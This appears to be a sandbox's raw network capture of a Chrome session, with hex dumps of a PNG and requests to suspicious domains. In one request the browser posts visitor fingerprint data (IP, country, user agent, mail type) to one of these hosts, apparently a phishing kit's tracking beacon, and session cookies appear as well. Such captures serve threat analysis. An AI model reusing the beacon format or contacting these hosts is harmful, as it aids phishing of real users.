                                                        2024-09-13 13:07:13 UTC670INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:13 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 49602
                                                        Connection: close
                                                        Content-Disposition: inline; filename="ijObORQlCLMm2wtNQQu4X6vzo1r1kH5DCm8ZWboPK5ajklhyZEj0Un9B1grOfAWcoqpef210"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bC0OFxY8bZeZBv0Nw%2BM9nAWWCueCwDoXdSQOq%2FgJR1sCyknHdZyMwui42a%2BXxHOQ8VT4MFvH6eF4L70zwTGH6OHKgr8MPsda0Tnwo5yxu5%2F9n4L27Bi5YYAYWP1%2FcQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285be3a95b42d7-EWR
                                                        2024-09-13 13:07:13 UTC699INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 70 00 00 01 bb 08 06 00 00 00 a1 7b f0 cd 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 3b b6 00 00 3b b6 01 16 33 14 2b 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 77 77 77 2e 69 6e 6b 73 63 61 70 65 2e 6f 72 67 9b ee 3c 1a 00 00 20 00 49 44 41 54 78 9c ec dd 77 98 5d 55 bd ff f1 f7 4c 1a 49 28 21 04 42 ef bd 08 4a bb 0a 52 94 aa 02 16 50 44 e1 7a 2d a8 28 a0 82 a2 34 51 01 f1 2a 4d 51 2e 20 0a 28 fa 13 45 45 04 41 50 3a ea 05 04 0d 08 48 49 a4 05 09 10 20 09 e9 c9 ef 8f 75 72 33 09 93 72 ce 59 fb 7c f7 de e7 fd 7a 9e ef 33 93 32 c9 67 d6 de 7b f6 cc 59 df bd 56 0f ea 36 c3 81 75 80 b5 80 55 80 95 80 51 8d 5a 19 58 1e 18 01 0c 06 96 6d d4 a0 c6 c7 0d ee e7 df
                                                        Data Ascii: PNGIHDRp{sBIT|dpHYs;;3+tEXtSoftwarewww.inkscape.org< IDATxw]ULI(!BJRPDz-(4Q*MQ. (EEAP:HI ur3rY|z32g{YV6uUQZXm
                                                        2024-09-13 13:07:13 UTC1369INData Raw: 7b 01 f8 3d 70 2d 70 3d 6e b9 22 49 92 24 49 92 24 49 92 24 65 67 03 47 bc 81 c0 ee c0 81 c0 01 c0 e8 d8 38 b5 f5 08 69 02 fa 06 d2 8a 02 93 62 e3 a8 20 5b 00 7b 91 56 ae d9 15 18 16 1b a7 96 e6 90 56 e4 b8 12 f8 39 36 47 49 92 24 49 92 24 49 92 24 49 59 d8 c0 11 63 20 f0 16 52 d3 c6 bb 80 51 b1 71 ba ce 2c d2 f6 10 bf 05 ae 02 fe 19 1b 47 6d 18 0a ec 01 ec 0f bc 0d 58 3d 36 4e 57 ba 0b f8 05 a9 99 63 6c 70 16 49 92 24 49 92 24 49 92 24 49 5a 2a 9b 02 67 00 cf 02 73 ad d2 d4 63 c0 b9 a4 46 80 41 8b 3c 7a 2a 8b 51 c0 61 c0 15 c0 2b c4 9f 3f d6 fc ba 1b 38 1c 58 6e 91 47 4f 92 24 49 92 24 49 92 24 49 92 82 2c 4f 9a 6c be 81 b4 f5 40 f4 04 ab b5 f8 7a 1e b8 0c d8 8f b4 52 8a ca 61 24 e9 3a ba 1a 98 49 fc 79 62 2d be a6 92 1a 6c f6 c0 95 9e 24 49 92 24 49 92
                                                        Data Ascii: {=p-p=n"I$I$I$egG8ib [{VV96GI$I$I$IYc RQq,GmX=6NWclpI$I$I$IZ*gscFA<z*Qa+?8XnGO$I$I$I,Ol@zRa$:Iyb-l$I$I
                                                        2024-09-13 13:07:13 UTC1369INData Raw: 49 92 24 49 92 24 49 92 a0 fa 0d 1c 67 00 e7 50 9f 95 44 24 49 9d b3 1a f0 47 60 db e8 20 92 24 49 92 24 49 92 24 49 52 95 1b 1f 4e 03 8e 8f 0e 21 49 aa bc 97 80 3d 80 7b a2 83 48 92 24 49 92 24 49 92 24 a9 7b 55 75 05 8e af 60 f3 86 24 29 8f 11 c0 75 b8 9d 8a 24 49 92 24 49 92 24 49 92 02 55 71 05 8e 63 81 6f 46 87 90 24 d5 ce 04 60 77 e0 81 e8 20 92 24 49 92 24 49 92 24 49 ea 3e 55 6b e0 f8 2c 70 56 74 08 49 52 6d fd 9b d4 c4 f1 60 74 10 49 92 24 49 92 24 49 92 24 75 97 2a 35 70 1c 05 9c 1b 1d 42 92 54 7b 4f 03 bb 02 8f 45 07 91 24 49 92 24 49 92 24 49 52 f7 a8 4a 03 c7 11 c0 79 54 27 af 24 a9 da 9e 20 35 71 8c 0b ce 21 49 92 24 49 92 24 49 92 a4 2e 51 85 86 88 f7 00 57 00 bd d1 41 24 49 5d e5 31 e0 3f 80 e7 a3 83 48 92 24 49 92 24 49 92 24 a9 fe ca de
                                                        Data Ascii: I$I$IgPD$IG` $I$I$IRN!I={H$I$I${Uu`$)u$I$I$IUqcoF$`w $I$I$I>Uk,pVtIRm`tI$I$I$u*5pBT{OE$I$I$IRJyT'$ 5q!I$I$I.QWA$I]1?H$I$I$
                                                        2024-09-13 13:07:13 UTC1369INData Raw: 03 af 5f ba c3 a2 12 1b 01 5c 40 fc 39 d5 e9 7a 77 8e c1 93 24 49 92 24 49 92 24 49 92 8a f6 51 e2 27 d7 3a 59 37 00 6b 67 19 39 95 c5 bc 46 8e 7f 10 7f 7e d5 a9 66 00 97 01 9b 2c fd a1 50 45 bc 03 78 86 f8 73 ac 53 35 1e 18 99 65 e4 24 49 92 24 49 92 24 49 92 a4 82 ac 01 4c 24 7e 72 ad 13 35 13 38 06 57 dd a8 b3 5e e0 60 60 0c f1 e7 5b 95 6b 2a f0 5d d2 d6 4a aa af 55 81 9b 89 3f df 3a 55 97 66 19 35 49 92 24 49 92 24 49 92 24 a9 20 57 13 3f a9 d6 89 7a 16 d8 2d cf 90 a9 02 7a 81 f7 00 0f 12 7f ee 55 a9 66 00 df 03 56 6f 7e c8 55 51 03 81 33 89 3f f7 3a 55 fb e6 19 36 49 92 24 49 92 24 49 92 24 29 af 43 89 9f 4c eb 44 dd 85 2b 09 74 a3 cd 81 a7 89 3f ff aa 50 73 80 2b 80 8d 5a 1a 69 d5 c1 01 c0 4b c4 9f 8b 45 d7 d3 c0 88 4c 63 26 49 92 24 49 92 24 49 92
                                                        Data Ascii: _\@9zw$I$I$IQ':Y7kg9F~f,PExsS5e$I$I$IL$~r58W^``[k*]JU?:Uf5I$I$I$ W?z-zUfVo~UQ3?:U6I$I$I$)CLD+t?Ps+ZiKELc&I$I$I
                                                        2024-09-13 13:07:13 UTC1369INData Raw: 5a cb 92 1a 76 a2 cf bb a8 9a 00 ec d1 f6 28 4a e5 72 3e f1 d7 56 8e da 36 f7 c0 48 92 24 49 92 24 49 92 24 a9 3b 8c 02 a6 12 3f e1 d5 6e 7d 25 f7 c0 a8 b4 06 00 57 11 7f ce 45 d5 c3 c0 46 6d 8f a2 54 3e cb 03 4f 10 7f 8d b5 5b 97 64 1e 17 49 92 24 49 92 24 49 92 24 75 89 e3 89 9f ec 6a b7 1e 02 96 c9 3d 30 2a ad ef 10 7f ce 45 d5 f5 c0 88 f6 87 50 2a ad b7 11 7f 9d b5 5b d3 80 d1 b9 07 46 92 24 49 92 24 49 92 24 49 f5 36 80 7a 3c ed bc 6b ee 81 51 69 7d 96 f8 f3 2d aa be 4d ba 66 a5 ba fb 25 f1 d7 5b bb f5 a5 ec a3 22 49 92 24 49 92 24 49 92 a4 5a db 8b f8 49 ae 76 eb ca ec a3 a2 b2 7a 3b 30 8b f8 73 ae d3 35 0b 38 2a c3 f8 49 55 b1 3e 69 15 8b e8 6b af 9d fa 67 f6 51 91 24 49 92 24 49 92 24 49 52 ad fd 88 f8 49 ae 76 6a 06 b0 51 f6 51 51 19 6d 0b 4c 26
                                                        Data Ascii: Zv(Jr>V6H$I$I$;?n}%WEFmT>O[dI$I$I$uj=0*EP*[F$I$I$I6z<kQi}-Mf%["I$I$IZIvz;0s58*IU>ikgQ$I$I$IRIvjQQQmL&
                                                        2024-09-13 13:07:13 UTC1369INData Raw: 92 a4 6e 72 10 f1 f7 e2 5c 75 46 e6 b1 91 fa 33 84 6a 3f 20 d8 b7 1e 21 35 71 49 aa 89 0f 13 ff 85 a5 d5 fa 49 01 e3 a1 72 d8 99 d4 a0 13 7d 8e 75 a2 a6 e2 de 7e 52 ab d6 02 66 12 7f 1d b7 52 2f 02 83 f2 0f 89 54 2a 2b 02 47 50 ed d5 de ba a5 66 03 37 02 87 02 c3 fa 3b 98 92 d4 61 a7 12 ff b5 d1 aa 7e 3d 49 5a c9 e5 9d c0 b2 48 92 54 6f 57 11 7f ef cd 55 8f 66 1e 1b a9 3f fb 11 7f ae e7 ac 6d f2 0e 8f a4 48 bf 22 fe 8b 4a ab b5 53 01 e3 a1 78 ab 03 e3 89 3f bf 3a 51 53 80 3d f3 0c 9b d4 b5 ae 24 fe 5a 6e b5 76 2f 60 3c a4 32 d8 16 b8 18 78 95 f8 eb cc 6a be 5e 06 fe 07 d8 6a e1 03 2b 49 1d 74 0b f1 5f 0f ad 7a d5 34 e0 f7 c0 67 80 8d 90 24 a9 7e fe 4d fc fd 36 67 2d 97 77 78 a4 d7 38 8d f8 f3 3c 67 7d 28 eb e8 48 0a 33 14 98 4c fc 17 95 56 ea be 02 c6 43
                                                        Data Ascii: nr\uF3j? !5qIIr}u~RfR/T*+GPf7;a~=IZHToWUf?mH"JSx?:QS=$Znv/`<2xj^j+It_z4g$~M6g-wx8<g}(H3LVC
                                                        2024-09-13 13:07:13 UTC1369INData Raw: 6f e0 ef c0 59 c0 0a c1 59 24 49 92 24 49 25 d0 5f 03 c7 f6 1d 4f 91 87 db a7 54 df 76 c0 17 a3 43 14 e8 29 60 3f 60 52 74 10 a9 cb bd 08 dc 19 1d a2 05 db 46 07 50 57 58 01 b8 80 f4 44 e8 6a c1 59 d4 dd 3e 0c dc 03 bc 21 3a 88 24 49 05 1b 04 7c 96 b4 65 dd 7b 82 b3 48 92 24 49 92 82 f5 d7 c0 f1 fa 8e a7 68 df 74 e0 0f d1 21 d4 96 e1 a4 7d cf 07 45 07 29 c8 44 d2 93 35 4f 45 07 91 04 54 b3 e9 6f 2d 60 95 e8 10 aa b5 9d 80 31 a4 6d be a4 32 d8 84 d4 70 77 54 74 10 49 92 3a 60 55 e0 17 c0 ff c3 ef fb 25 49 92 24 a9 6b f5 d7 c0 51 c5 a7 dc 6e 06 26 47 87 50 5b ce 24 ed 01 5b 47 d3 81 77 01 ff 88 0e 22 e9 ff 5c 13 1d a0 45 55 6c b2 54 f9 f5 90 56 c0 ba 99 d4 28 24 95 c9 10 e0 5c e0 c7 c0 b0 e0 2c 92 24 75 c2 fb 80 07 80 43 a2 83 48 92 24 49 92 3a af 2e 2b 70
                                                        Data Ascii: oYY$I$I%_OTvC)`?`RtFPWXDjY>!:$I|e{H$Iht!}E)D5OETo-`1m2pwTtI:`U%I$kQn&GP[$[Gw"\EUlTV($\,$uCH$I:.+p
                                                        2024-09-13 13:07:13 UTC1369INData Raw: 05 18 a9 6e aa 76 4f d9 30 3a 80 4a e3 10 e0 ec e8 10 52 c9 f5 02 3f 02 b6 89 0e 22 49 52 87 0d 00 2e 23 6d 2b 26 49 92 24 49 dd 6e f5 02 3e 7e 74 3f bf 37 1c 38 72 09 ff d6 89 a4 2d 30 17 b6 ea bc 06 8e 35 9b 08 56 16 8f 44 07 d0 12 1d 4e 5a 81 a3 4e 2e 03 be 1f 1d 42 52 76 55 bb a7 8c 00 96 8d 0e a1 70 6f 25 2d 8d dd 13 1d 44 aa 80 e1 c0 55 f4 ff 03 95 24 49 75 36 af 89 e3 1d d1 41 24 49 92 24 a9 8b fc 17 b0 dc 22 fe ec 2d c0 56 8b fa c0 81 8d b7 ab e6 4e d4 01 55 7b 5a ba db ac 08 7c 2d 3a 44 66 8f 02 9f 8a 0e 21 a9 10 55 bc a7 ac 46 f5 1a 4f 94 cf 36 c0 2f e9 bf 43 57 52 ff d6 06 7e 4e fa 01 69 56 70 16 49 92 3a 69 20 f0 33 52 03 f0 9f 83 b3 48 92 24 49 52 94 cb 80 c7 fb f9 fd ad 81 8d fb fc fa 71 e0 9e 7e fe de 5d 4d fc 5f cb 93 9a 38 be dd cf 9f 1d
                                                        Data Ascii: nvO0:JR?"IR.#m+&I$In>~t?78r-05VDNZN.BRvUpo%-DU$Iu6A$I$"-VNU{Z|-:Df!UFO6/CWR~NiVpI:i 3RH$IRq~]M_8
                                                        2024-09-13 13:07:13 UTC1369INData Raw: 25 bd c8 1d 7d 5e e4 aa f7 e5 1d 1e 75 a1 65 80 af 92 26 0c 17 77 ae fd 18 97 c3 2f 9b bd 88 ff 1a d4 6c f9 a2 76 3d 0d 06 ee 22 fe fc aa 7a dd 0a 7c 90 fa 3f e5 3b 08 38 80 d4 cd 3d 93 f8 71 af 7a cd db 97 52 52 f9 8d 25 fe 6b 46 11 75 4c ce 41 aa b8 95 48 ab 4f 1d 05 fc 84 d4 10 1f 7d 7c ea 5e 13 80 d5 97 7c 68 24 49 15 34 84 f8 fb 4c ee 5a 2f eb 08 49 af 75 19 f1 e7 79 ce 3a 36 ef f0 48 b5 72 16 0b 5e 2f ff d3 c4 c7 f6 7d 4d b6 bf 45 28 fe b4 d0 bf 7d 57 3f 7f e7 e5 be 7f a7 97 ea 2d c1 3e 31 3a 80 16 70 06 d0 1b 1d 22 93 df 90 9e ce 95 5a b5 07 a9 c9 ec 24 96 3c 61 f8 01 e0 16 60 95 a2 43 69 a9 55 f1 fe 52 b5 55 b4 b4 74 be 0a 6c 17 1d a2 a2 26 01 e7 02 9b 03 bb 90 9a e5 ea be 4a cd 4c e0 2a 60 7f d2 53 cb 5f 04 1e 09 4d 54 6d 5f 25 4d 18 4a 92 e2 bd
                                                        Data Ascii: %}^ue&w/lv="z|?;8=qzRR%kFuLAHO}|^|h$I4LZ/Iuy:6Hr^/}ME(}W?->1:p"Z$<a`CiURUtl&JL*`S_MTm_%MJ
                                                        2024-09-13 13:07:13 UTC1369INData Raw: 8b b6 0b 70 60 74 08 49 92 24 49 ea 06 bd a4 2d 02 a4 25 e9 a1 3e ab 6f 7c 9d b4 6c aa b4 b0 bd 48 13 58 5f 06 86 04 65 58 1f 57 e1 88 54 b5 c9 e2 aa 35 61 6a 41 67 e1 b6 49 0b bb 11 d8 06 b8 3d 3a 48 97 9a 0c 1c 0c 7c 0e 98 19 9c a5 4c 36 07 f6 8b 0e 21 49 2a cc 44 e0 e3 c0 bb 80 e7 83 b3 94 d9 37 88 fb 39 59 92 24 49 92 ba 46 15 b7 50 71 ff f3 18 07 90 f6 a0 af ba 47 81 6f 46 87 50 e9 8c 06 2e 07 ae 07 36 08 ce 02 ae c2 11 a9 6a f7 98 aa dd c3 35 df 3e c0 be d1 21 4a e6 3b a4 31 79 31 3a 88 38 9b b4 7d cd 0b d1 41 4a e4 84 e8 00 92 a4 c2 fd 9a d4 48 7a 73 70 8e b2 5a 1f 38 2a 3a 84 24 49 92 24 d5 9d 0d 1c 5a 1a 3d c0 49 d1 21 32 39 0a 98 16 1d 42 a5 d1 03 1c 0e 3c 08 1c 12 9c a5 af 0d 80 0f 46 87 e8 52 55 5b 81 a3 6a f7 70 25 3d c0 d7 a2 43 94 c8 2c d2
                                                        Data Ascii: p`tI$I-%>o|lHX_eXWT5ajAgI=:H|L6!I*D79Y$IFPqGoFP.6j5>!J;1y1:8}AJHzspZ8*:$I$Z=I!29B<FRU[jp%=C,


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        84192.168.2.549844172.67.148.274433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:13 UTC1543OUTPOST /jaG38jlE3Csa6VPdagQNh1ZGRwn6zNGNrENQrVC1wpG35UrCP39Qdzk HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        Content-Length: 249
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Accept: */*
                                                        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                        X-Requested-With: XMLHttpRequest
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Origin: https://saj.mordantif.com
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6T
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:13 UTC249OUTData Raw: 70 61 67 65 6c 69 6e 6b 3d 6d 61 57 39 33 62 33 72 41 6a 25 32 46 66 49 4a 67 65 64 75 48 48 4a 41 25 33 44 25 33 44 26 6d 61 69 6c 74 79 70 65 3d 30 26 74 79 70 65 3d 33 26 74 79 70 65 76 61 6c 3d 30 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 63 6f 75 6e 74 72 79 3d 55 6e 69 74 65 64 2b 53 74 61 74 65 73 26 75 73 65 72 61 67 65 6e 74 3d 4d 6f 7a 69 6c 6c 61 25 32 46 35 2e 30 2b 28 57 69 6e 64 6f 77 73 2b 4e 54 2b 31 30 2e 30 25 33 42 2b 57 69 6e 36 34 25 33 42 2b 78 36 34 29 2b 41 70 70 6c 65 57 65 62 4b 69 74 25 32 46 35 33 37 2e 33 36 2b 28 4b 48 54 4d 4c 25 32 43 2b 6c 69 6b 65 2b 47 65 63 6b 6f 29 2b 43 68 72 6f 6d 65 25 32 46 31 31 37 2e 30 2e 30 2e 30 2b 53 61 66 61 72 69 25 32 46 35 33 37 2e 33 36 26 61 70 70 6e 75 6d 3d 31
                                                        Data Ascii: pagelink=maW93b3rAj%2FfIJgeduHHJA%3D%3D&mailtype=0&type=3&typeval=0&ip=8.46.123.33&country=United+States&useragent=Mozilla%2F5.0+(Windows+NT+10.0%3B+Win64%3B+x64)+AppleWebKit%2F537.36+(KHTML%2C+like+Gecko)+Chrome%2F117.0.0.0+Safari%2F537.36&appnum=1
                                                        2024-09-13 13:07:13 UTC1009INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:13 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: no-cache, private
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ok4TCSLKs568vRZHK8rhJMvk%2FzUpexFlWjD%2FwJbxyu47%2FX7WUuJygaQJnXpZOWq%2B9djquM7AfzT57IL8NwkAGYYhDCRyyut71OCo1qw%2FfhS3XJxMuF3rZCvUEVaZzg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Set-Cookie: XSRF-TOKEN=eyJpdiI6IkNrc3dPc3cwNWNzRk1BNmFZTUZxN0E9PSIsInZhbHVlIjoiWU9DckFJLzVhL0RHbGgwQ3dIWmpKajBmcXJjdGgvalpjMkVkK2ZQaFBWRGZmc0RPeG9vREdQRVdqb3I4USswMm1LdHV6cGRuSXQ2UTNOMGMxQzhaaEdzOGlPbzA1d1oyZ0xiZkwwSmZKNGRveGUzeDlrVEdNWnAzYU8vbXNPdnYiLCJtYWMiOiJiMzFkMDJkYmI5MjhiYjMyNDc2NTc5MjQwZWYxODhhNTFjNTVlMDk5ZDg5MmMxYWRiNzMwYzc1NDkyZDk2YjllIiwidGFnIjoiIn0%3D; expires=Fri, 13-Sep-2024 15:07:13 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                        2024-09-13 13:07:13 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 74 54 4e 32 35 74 54 46 4d 72 64 6b 74 54 4f 55 56 31 63 6a 67 32 64 6d 52 42 57 56 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 63 30 55 31 53 6e 4e 44 55 6a 5a 44 62 6e 4e 54 52 6d 74 57 61 47 6c 71 65 47 35 70 4f 55 35 4d 4d 6d 52 75 63 54 42 73 52 45 56 68 62 33 4a 61 55 6b 59 7a 53 30 64 34 4d 56 5a 52 59 6a 56 5a 53 6b 52 42 5a 33 4d 79 64 56 64 68 53 57 34 34 59 7a 5a 32 51 31 6c 4f 61 6b 31 4e 62 55 74 4a 5a 55 64 57 4f 55 39 53 62 7a 6b 7a 52 31 42 36 62 6d 35 4c 4c 7a 5a 55 54 6b 6f 33 4d 30 35 47 4d 44 6c 48 56 31 5a 75 4d 55 52 32 55 45 52 35 59 6e 42 6d 54 57 68 6c 4d 58 56 32 63 30 31 36 54 33 55 77 62 57 52 4c 61 46 6f
                                                        Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImtTN25tTFMrdktTOUV1cjg2dmRBWVE9PSIsInZhbHVlIjoic0U1SnNDUjZDbnNTRmtWaGlqeG5pOU5MMmRucTBsREVhb3JaUkYzS0d4MVZRYjVZSkRBZ3MydVdhSW44YzZ2Q1lOak1NbUtJZUdWOU9SbzkzR1B6bm5LLzZUTko3M05GMDlHV1ZuMUR2UER5YnBmTWhlMXV2c016T3UwbWRLaFo
                                                        2024-09-13 13:07:13 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                        Data Ascii: 11
                                                        2024-09-13 13:07:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        85192.168.2.549845104.21.43.1264433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:13 UTC442OUTGET /mcrnzgbukewizymfphpkvhpbdNTtqWTUKJKTWGNEVFPTXALIOMOEGHBDCPCMKMAPGJRGAJFMEAETHXYQQADDRrsZugH7WwfW12wPwx40 HTTP/1.1
                                                        Host: fipyf.orpkf.ru
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:07:13 UTC543INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:13 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        vary: Origin
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hAeIOYRBoz4asr5ziP3ZQymgd00ql2tjAlXwuM%2Fa32K%2FvUMfTE%2BaNqanfjPWRQnHrlIWNlQKll5SZPCy%2Fy4CQM9ZrCK9et6FzYdVvhtQkb46TahuTogvB3lkd8y1sEGMQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c285be99fff8c60-EWR
                                                        alt-svc: h3=":443"; ma=86400


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        86192.168.2.549847104.21.55.1244433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:14 UTC1119OUTGET /jaG38jlE3Csa6VPdagQNh1ZGRwn6zNGNrENQrVC1wpG35UrCP39Qdzk HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6IkNrc3dPc3cwNWNzRk1BNmFZTUZxN0E9PSIsInZhbHVlIjoiWU9DckFJLzVhL0RHbGgwQ3dIWmpKajBmcXJjdGgvalpjMkVkK2ZQaFBWRGZmc0RPeG9vREdQRVdqb3I4USswMm1LdHV6cGRuSXQ2UTNOMGMxQzhaaEdzOGlPbzA1d1oyZ0xiZkwwSmZKNGRveGUzeDlrVEdNWnAzYU8vbXNPdnYiLCJtYWMiOiJiMzFkMDJkYmI5MjhiYjMyNDc2NTc5MjQwZWYxODhhNTFjNTVlMDk5ZDg5MmMxYWRiNzMwYzc1NDkyZDk2YjllIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImtTN25tTFMrdktTOUV1cjg2dmRBWVE9PSIsInZhbHVlIjoic0U1SnNDUjZDbnNTRmtWaGlqeG5pOU5MMmRucTBsREVhb3JaUkYzS0d4MVZRYjVZSkRBZ3MydVdhSW44YzZ2Q1lOak1NbUtJZUdWOU9SbzkzR1B6bm5LLzZUTko3M05GMDlHV1ZuMUR2UER5YnBmTWhlMXV2c016T3UwbWRLaFoiLCJtYWMiOiJhNjgxOTlmNTlkNmY0YWRkYmQ4Y2RkZTcyZTc5ZTQ1MDFjMjM5ZDViYjdlMTM4ZTMzNjJmOGM1NTM4YmM5YzU3IiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:14 UTC581INHTTP/1.1 404 Not Found
                                                        Date: Fri, 13 Sep 2024 13:07:14 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zHmaNT1qx8G57SnTYFFYFSsgpZAdHZ9PysUswhbqmfcChtngJvyJ%2BJ4c1K7h0YdyL4sDDjIaieIP%2BW9%2FGPlBJT5uYwJWpq6dKiZxOQAzQaR5Jv%2FDmdXlPOTmnfJDhA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bef59c54334-EWR
                                                        2024-09-13 13:07:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        87192.168.2.54985035.190.80.14433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:30 UTC538OUTOPTIONS /report/v4?s=zHmaNT1qx8G57SnTYFFYFSsgpZAdHZ9PysUswhbqmfcChtngJvyJ%2BJ4c1K7h0YdyL4sDDjIaieIP%2BW9%2FGPlBJT5uYwJWpq6dKiZxOQAzQaR5Jv%2FDmdXlPOTmnfJDhA%3D%3D HTTP/1.1
                                                        Host: a.nel.cloudflare.com
                                                        Connection: keep-alive
                                                        Origin: https://saj.mordantif.com
                                                        Access-Control-Request-Method: POST
                                                        Access-Control-Request-Headers: content-type
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept-Encoding: gzip, deflate, br
